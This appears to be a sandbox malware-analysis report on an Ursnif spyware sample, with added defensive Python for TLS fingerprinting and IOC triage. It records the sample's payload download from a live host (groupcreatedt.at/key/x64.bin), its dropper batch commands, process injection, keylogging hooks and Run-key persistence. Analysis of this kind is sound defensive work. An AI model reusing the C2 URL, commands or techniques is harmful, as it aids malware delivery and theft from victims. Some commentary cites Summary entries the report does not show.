DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: Secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: devrtl.DLL/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/GetWindowLongPtrA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/SetWindowLongPtrA
DynamicLoader: USER32.dll/SetClipboardViewer
DynamicLoader: USER32.dll/IsClipboardFormatAvailable
DynamicLoader: USER32.dll/GetClipboardOwner
DynamicLoader: USER32.dll/RegisterDeviceNotificationA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: USER32.dll/GetMessageA
Encrypts a single HTTP packet
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
Reads data out of its own binary image
self_read: process: ErfkBwzLz2p.exe, pid: 920, offset: 0x00000000, length: 0x0004ea00
A process created a hidden window
Process: ErfkBwzLz2p.exe -> C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.php.net/license/3_0.txt
suspicious_request: http://groupcreatedt.at/key/x64.bin
Performs some HTTP requests
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00045a00, virtual_size: 0x00045910
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
Uses Windows utilities for basic functionality
command: C:\Users\user\AppData\Local\Temp\DA24\BF2.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
Queries information on disks for anti-virtualization via Device Information APIs
Behavioural detection: Injection (Process Hollowing)
Injection: corrawex.exe(948) -> svchost.exe(2092)
Executed a process and injected code into it, probably while unpacking
Injection: corrawex.exe(948) -> svchost.exe(2092)
Deletes its original binary from disk
Sniffs keystrokes
SetWindowsHookExA: Process: explorer.exe(1632)
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
A system process is generating network traffic likely as a result of process injection
network_connection: explorer.exe_WSASend_get /license/3_0.txt http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: www.php.net
network_connection: explorer.exe_WSASend_get /key/x64.bin http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: groupcreatedt.at
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00n\x01\x00\x00j\x03\x01^y\xd6\xc2\x1a\xba\x04%'v\xdd\xfd\x0b\xd2\x0b3\x1bs\xc1\x1dm\xea\xe2.n-k\xae[\x03w&\x00\x00\x18\x00/\x005\x00\x05\x00 \xc0\x13\xc0\x14\xc0 \xc0 \x002\x008\x00\x13\x00\x04\x01\x00\x00)\xff\x01\x00\x01\x00\x00\x00\x00\x10\x00\x0e\x00\x00\x0bwww.php.net\x00 \x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00f\x10\x00\x00ba\x040\xc2i}*\x8dmp\x8f5jw\x8b]\xff\xc9\xae\xd1\x96@\xe1!\xd0mi\xfa\xd1uh\xaf\x13-x\xf2\x8a\x86\x8b1\x7f\xa3\x18\x9e\xad\x1f/\xd8,\xb4\xa4y\x9f\xae\x13\xff\xa7\x8cs\x1d\xcbk\x94\x04vg\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000ul\xaf\x0c\xe3\x7fop\xad\xf7.\x8b\x15\x89\xfa\xa1\x1cb\x91c\x91\x1c\x91\xab\xd7a\x18\xb6\xc6f\x9c\x9c\xd6\x9e\x17o\xd8\xeb"(\xa5t\x93 \x11\xdc\xb4"
network_connection: explorer.exe_WSASend_get /msdownload/update/v3/static/trustedr/en/authrootstl.cab http/1.1 cache-control: max-age = 3600 connection: keep-alive accept: */* if-modified-since: wed, 26 feb 2020 21:39:14 gmt if-none-match: "06d5b30edecd51:0" user-agent: microsoft-cryptoapi/
network_connection: explorer.exe_WSASend_\x17\x03\x01\x00\x90\x8fc\x1c\x90\xf1\x01\x0e\x89y=\x11i-\x89\xc7n\xc5\xd5\xe9z\x94q\x0b\x13\xcf\x84z+\xc8\xfa\x16\xf4\xdd\xae\xa5\xb3'c\x9c\xbc\xc8c\xaed\x05[d\x06\xee\xb6\x84n\xc61{@\xbc9\xae\xb7\xb3\x10\xbe\x1e\xa8\x06\x0e\xf9(\xe3\x073'\x0e\x16`3 y\xce#\xd9\x80\\x1d\x12\xf4q;\xc9\xa7\xc7c\x01\x06l +}\x9d\xbf\xf2e\xa0\x83x\x80\xf4\xcb\xf3\x7f\x05\xd2\xd8%v\xcf\x8awlh\x84|\x153$\xcca\xd0q\xdax#\xda\xc9\xd5{@b\xdap\xcb\x97?
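The WSASend buffers above are the only record of where the injected explorer.exe went once the traffic left plaintext HTTP: the third buffer is a TLS 1.0 ClientHello, and its server_name extension carries the host. The Python below is an added example, not part of this CAPE report or of CAPE itself. It rebuilds that ClientHello from the escaped dump (the signature lowercased the buffer and this page collapsed its raw tab and newline bytes into spaces, so 0x09 and 0x0a are restored at the four positions where only those values keep the record, handshake and extension length fields consistent; the twelve suites then come out in the order Windows 7 Schannel offers them), parses it, and resolves every buffer to a destination host. The first four bytes of the random are the client's gmt_unix_time and decode to 2020-03-24 09:45:38 UTC, inside this run's 09:43 to 09:46 window, which is a good check that the reconstruction is right. The two HTTP buffers are constructed with the CRLFs the report flattened, and the JA3 string is built without GREASE filtering because Schannel sent none.

```python
import hashlib
import re
import struct
from datetime import datetime, timezone

# ClientHello sent by the injected explorer.exe (third WSASend buffer above), rebuilt
# from the report's escaped dump. Assumption: the report lowercased the buffer and
# this page turned its raw tab/newline bytes into spaces; 0x09 and 0x0a are restored
# at the four spots where only those values keep every length field consistent.
CLIENT_HELLO = (
    b"\x16\x03\x01\x00n"                       # record: handshake, TLS 1.0, 110 bytes
    b"\x01\x00\x00j\x03\x01"                   # ClientHello, 106 bytes, version TLS 1.0
    b"^y\xd6\xc2\x1a\xba\x04%'v\xdd\xfd\x0b\xd2\x0b3\x1bs\xc1\x1dm\xea\xe2.n-k\xae[\x03w&"
    b"\x00"                                    # session id: empty
    b"\x00\x18\x00/\x005\x00\x05\x00\n\xc0\x13\xc0\x14\xc0\t\xc0\n\x002\x008\x00\x13\x00\x04"
    b"\x01\x00"                                # compression: null only
    b"\x00)"                                   # extensions: 41 bytes
    b"\xff\x01\x00\x01\x00"                    # renegotiation_info
    b"\x00\x00\x00\x10\x00\x0e\x00\x00\x0bwww.php.net"   # server_name
    b"\x00\n\x00\x06\x00\x04\x00\x17\x00\x18"  # supported_groups: secp256r1, secp384r1
    b"\x00\x0b\x00\x02\x01\x00"                # ec_point_formats: uncompressed
)

# Other buffers from the same signature, as constructed samples: the report flattened
# the CRLFs of the two HTTP requests; the last one stands in for an encrypted record.
WSASEND_BUFFERS = [
    b"GET /license/3_0.txt HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\nHost: www.php.net\r\n\r\n",
    b"GET /key/x64.bin HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\nHost: groupcreatedt.at\r\n\r\n",
    CLIENT_HELLO,
    b"\x17\x03\x01\x00\x90" + bytes(0x90),
]

def _u16(b, i):
    return struct.unpack(">H", b[i:i + 2])[0]

def parse_client_hello(buf):
    """Parse one TLS record holding a ClientHello. Returns None for anything else
    (HTTP requests, application-data records, truncated buffers)."""
    if len(buf) < 9 or buf[0] != 0x16 or buf[5] != 0x01:
        return None
    rec_len, hs_len = _u16(buf, 3), int.from_bytes(buf[6:9], "big")
    if rec_len != hs_len + 4 or len(buf) < 5 + rec_len or hs_len < 38:
        return None
    hs = buf[9:9 + hs_len]
    version = _u16(hs, 0)
    gmt_unix_time = struct.unpack(">I", hs[2:6])[0]   # first 4 bytes of the random
    pos = 35 + hs[34]                                 # skip random and session id
    cs_len = _u16(hs, pos); pos += 2
    suites = [_u16(hs, i) for i in range(pos, pos + cs_len, 2)]; pos += cs_len
    pos += 1 + hs[pos]                                # compression methods
    sni, groups, formats, ext_types = None, [], [], []
    if pos + 2 <= len(hs):
        ext_end = pos + 2 + _u16(hs, pos); pos += 2
        while pos + 4 <= ext_end:
            etype, elen = _u16(hs, pos), _u16(hs, pos + 2)
            data = hs[pos + 4:pos + 4 + elen]; pos += 4 + elen
            ext_types.append(etype)
            if etype == 0x0000 and len(data) >= 5:      # server_name: host_name entry
                sni = data[5:5 + _u16(data, 3)].decode("ascii", "replace")
            elif etype == 0x000a and len(data) >= 2:    # supported_groups
                groups = [_u16(data, i) for i in range(2, 2 + _u16(data, 0), 2)]
            elif etype == 0x000b and len(data) >= 1:    # ec_point_formats
                formats = list(data[1:1 + data[0]])
    # JA3 string: version,ciphers,extensions,groups,formats (no GREASE to strip here)
    ja3 = ",".join([str(version)] + ["-".join(map(str, x)) for x in (suites, ext_types, groups, formats)])
    return {"version": version, "gmt_unix_time": gmt_unix_time,
            "time": datetime.fromtimestamp(gmt_unix_time, timezone.utc),
            "suites": suites, "sni": sni, "groups": groups,
            "ja3": ja3, "ja3_hash": hashlib.md5(ja3.encode()).hexdigest()}

HOST_HDR = re.compile(rb"host:\s*([^\s\r\n]+)", re.I)

def destination_hosts(buffers):
    """Resolve each WSASend buffer to the host it was for: the Host header of a
    plaintext request or the SNI of a ClientHello; None when neither is present."""
    out = []
    for buf in buffers:
        hello = parse_client_hello(buf)
        if hello:
            out.append(hello["sni"])
        else:
            m = HOST_HDR.search(buf)
            out.append(m.group(1).decode("ascii", "replace") if m else None)
    return out

if __name__ == "__main__":
    h = parse_client_hello(CLIENT_HELLO)
    print(h["sni"], h["time"].isoformat(), h["ja3"])
    print(destination_hosts(WSASEND_BUFFERS))
```

The point of resolving hosts this way is that the sandbox only labels the plaintext requests; the TLS session to www.php.net from a system process would otherwise show up as an unattributed blob. The JA3 string is the Schannel profile of the guest, so a mismatch here would be a sign that the injected code carries its own TLS stack.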
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Exhibits behavior characteristics of Ursnif spyware
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Creates a slightly modified copy of itself
file: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
percent_match: 99
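Two of the four URLs under "Performs some HTTP requests" are not the sample's doing. Building the chain for the www.php.net certificate makes crypt32/cryptnet fetch the Windows Update trusted-root CTL (authrootstl.cab) and a Microsoft root certificate, which is why the windowsupdate.com request above carries a microsoft-cryptoapi user-agent while the GETs from the injected process carry none, and why the Summary fills up with Cab*.tmp/Tar*.tmp files and CryptnetUrlCache entries as crypt32 unpacks the CTL. The Python below is an added example, not CAPE's code, that applies those rules to lines copied from this report: it splits the URLs into OS background fetches and attacker-initiated requests (keeping the legitimate www.php.net host apart from the payload URL so nobody blocks php.net), drops the CryptoAPI file noise, pulls out the dropped binary, Run key, injection and hook facts, and flags gfycfilt.dll, which the Summary shows in six directories of the DLL search order plus the dropper's own folder because something loaded a DLL that is not present on the guest. The CryptoAPI URL allowlist and the known-good host set are assumptions of the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed input: lines copied verbatim from the signature hits and Summary above.
SIGNATURE_LINES = r"""
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Injection: corrawex.exe(948) -> svchost.exe(2092)
SetWindowsHookExA: Process: explorer.exe(1632)
""".strip().splitlines()

FILE_PATHS = r"""
C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
""".strip().splitlines()

# Fetches CryptoAPI makes on its own while building a chain (Windows Update CTL and
# a Microsoft root from its AIA URL). Assumed allowlist, as is LEGIT_HOSTS.
CRYPTOAPI_FETCH = re.compile(r"^http://(www\.download\.windowsupdate\.com/.*/authrootstl\.cab"
                             r"|www\.microsoft\.com/pki/certs/[^/]+\.crt)$", re.I)
LEGIT_HOSTS = {"www.php.net"}
CAB_TMP = re.compile(r"\\(Cab|Tar)[0-9A-F]{4}\.tmp$", re.I)     # crypt32 unpacking the CTL
INJECT = re.compile(r"^Injection: (\S+)\((\d+)\) -> (\S+)\((\d+)\)$")

def classify_url(url):
    """Separate CryptoAPI's own chain-building fetches from requests the sample made."""
    if CRYPTOAPI_FETCH.match(url):
        return "os-background"
    host = urlparse(url).hostname or ""
    return "attacker-legit-host" if host in LEGIT_HOSTS else "attacker"

def classify_path(path):
    """Cab*/Tar*.tmp and CryptnetUrlCache entries are crypt32 side effects, not IOCs."""
    if CAB_TMP.search(path) or "\\CryptnetUrlCache\\" in path:
        return "cryptoapi-noise"
    return "artifact"

def dll_search_probes(paths, min_dirs=3):
    """A DLL name probed through several search-order directories means a load of a
    DLL that is not on the box: an IOC and a side-loading opportunity worth noting."""
    dirs = defaultdict(set)
    for p in paths:
        d, _, name = p.rpartition("\\")
        if name.lower().endswith(".dll"):
            dirs[name.lower()].add(d.lower())
    return {n: sorted(d) for n, d in dirs.items() if len(d) >= min_dirs}

def extract_iocs(lines):
    """Reduce the signature output to the facts an analyst acts on."""
    iocs = {"urls": {}, "dropped": [], "persistence": None, "injections": [], "hooks": []}
    pending_key = None
    for line in lines:
        m = INJECT.match(line)
        if m:
            src, spid, dst, dpid = m.groups()
            iocs["injections"].append((src, int(spid), dst, int(dpid)))
            continue
        tag, _, value = line.partition(": ")
        if tag == "url":
            iocs["urls"][value] = classify_url(value)
        elif tag == "binary" and value not in iocs["dropped"]:
            iocs["dropped"].append(value)
        elif tag == "key":
            pending_key = value                 # its "data:" line follows
        elif tag == "data" and pending_key:
            iocs["persistence"] = (pending_key, value)
            pending_key = None
        elif tag == "SetWindowsHookExA":
            iocs["hooks"].append(value.split("Process: ")[-1])
    return iocs

def triage(lines, paths):
    iocs = extract_iocs(lines)
    iocs["files"] = [p for p in paths if classify_path(p) == "artifact"]
    iocs["dll_probes"] = dll_search_probes(paths)
    return iocs

if __name__ == "__main__":
    for key, value in triage(SIGNATURE_LINES, FILE_PATHS).items():
        print(key, value)
```

Run against the lines above, the only URL left in the "attacker" class is http://groupcreatedt.at/key/x64.bin, the persistence entry is the Run value dnshdrt pointing at corrawex.exe, and the DLL probe list holds just gfycfilt.dll; system64.dll in Roaming is seen in one directory only and stays in the artifact list rather than the probe list.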

Hosts

Direct  IP               Country
Y       8.8.8.8          United States
N       23.202.161.73    United States
N       192.42.116.41    Netherlands
N       192.229.232.240  United States
N       185.85.0.29      Germany

DNS

Name                             Response
www.php.net                      A 185.85.0.29
                                 CNAME www-php-net.ax4z.com
www.download.windowsupdate.com   CNAME cs12.wpc.v0cdn.net
                                 A 192.229.232.240
                                 CNAME 2-01-3cf7-0009.cdx.cedexis.net
                                 CNAME wu.ec.azureedge.net
                                 CNAME wu.wpc.apr-52dd2.edgecastdns.net
                                 CNAME wu.azureedge.net
www.microsoft.com                CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                 CNAME e13678.dspb.akamaiedge.net
                                 CNAME www.microsoft.com-c-3.edgekey.net
                                 A 23.202.161.73
groupcreatedt.at                 A 192.42.116.41

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
